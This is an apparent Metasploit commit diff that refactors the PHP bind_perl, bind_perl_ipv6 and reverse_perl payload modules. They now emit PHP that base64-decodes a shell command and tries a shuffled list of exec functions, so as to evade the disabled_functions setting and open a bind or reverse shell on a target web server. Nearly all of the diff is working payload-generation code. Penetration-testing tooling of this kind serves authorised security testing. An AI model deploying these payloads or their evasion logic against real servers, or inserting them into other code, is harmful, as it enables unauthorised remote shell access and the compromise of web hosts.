Use php_preamble/php_system_block instead of system in payloads/singles/php/

The `php_preamble`/`php_system_block` combo has builtin low-hanging evasion for
PHP's `disabled_functions` configuration (eg. `system` might not be available
but `shell_exec` is), so use it instead of hardcoding `system`.

This commit also brings modules/payloads/singles/php/reverse_perl.rb's style
more in line with the other uses of `php_preamble`/`php_system_block`.

Oh, and it makes lib/msf/core/payload/php.rb work on older Ruby version as
well.

Co-authored-by: Valentin Lobstein <[email protected]>

Author: jvoisin

lib/msf/core/payload/php.rb

@@ -134,8 +134,8 @@ def php_system_block(options = {})
       }
     "
 
-    exec_methods = [passthru, shell_exec, system, exec, proc_open, popen];
-    shuffle(exec_methods);
+    exec_methods = [passthru, shell_exec, system, exec, proc_open, popen]
+    exec_methods = exec_methods.shuffle
     buf = setup + exec_methods.join("") + fail_block
 
     return buf

modules/payloads/singles/php/bind_perl.rb

@@ -6,10 +6,11 @@
 
 module MetasploitModule
 
-  CachedSize = 230
+  CachedSize = :dynamic
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
+  include Msf::Payload::Php
 
   def initialize(info = {})
     super(merge_info(info,
@@ -34,7 +35,14 @@ def initialize(info = {})
   # Constructs the payload
   #
   def generate(_opts = {})
-    return super + "system(base64_decode('#{Rex::Text.encode_base64(command_string)}'));"
+    vars = Rex::RandomIdentifier::Generator.new
+    dis = "$#{vars[:dis]}"
+    shell = <<-END_OF_PHP_CODE
+              #{php_preamble(disabled_varname: dis)}
+              $c = base64_decode("#{Rex::Text.encode_base64(command_string)}");
+              #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
+    return super + shell
   end
 
   #

modules/payloads/singles/php/bind_perl_ipv6.rb

@@ -6,10 +6,11 @@
 
 module MetasploitModule
 
-  CachedSize = 230
+  CachedSize = :dynamic
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
+  include Msf::Payload::Php
 
   def initialize(info = {})
     super(merge_info(info,
@@ -34,7 +35,14 @@ def initialize(info = {})
   # Constructs the payload
   #
   def generate(_opts = {})
-    return super + "system(base64_decode('#{Rex::Text.encode_base64(command_string)}'));"
+    vars = Rex::RandomIdentifier::Generator.new
+    dis = "$#{vars[:dis]}"
+    shell = <<-END_OF_PHP_CODE
+              #{php_preamble(disabled_varname: dis)}
+              $c = base64_decode("#{Rex::Text.encode_base64(command_string)}");
+              #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
+    return super + shell
   end
 
   #

modules/payloads/singles/php/reverse_perl.rb

@@ -35,11 +35,14 @@ def initialize(info = {})
   # Constructs the payload
   #
   def generate(_opts = {})
-    buf = "#{php_preamble}"
-    buf += "$c = base64_decode('#{Rex::Text.encode_base64(command_string)}');"
-    buf += "#{php_system_block({:cmd_varname=>"$c"})}"
-    return super + buf
-
+    vars = Rex::RandomIdentifier::Generator.new
+    dis = "$#{vars[:dis]}"
+    shell = <<-END_OF_PHP_CODE
+              #{php_preamble(disabled_varname: dis)}
+              $c = base64_decode("#{Rex::Text.encode_base64(command_string)}");
+              #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
+    return super + shell
   end
 
   #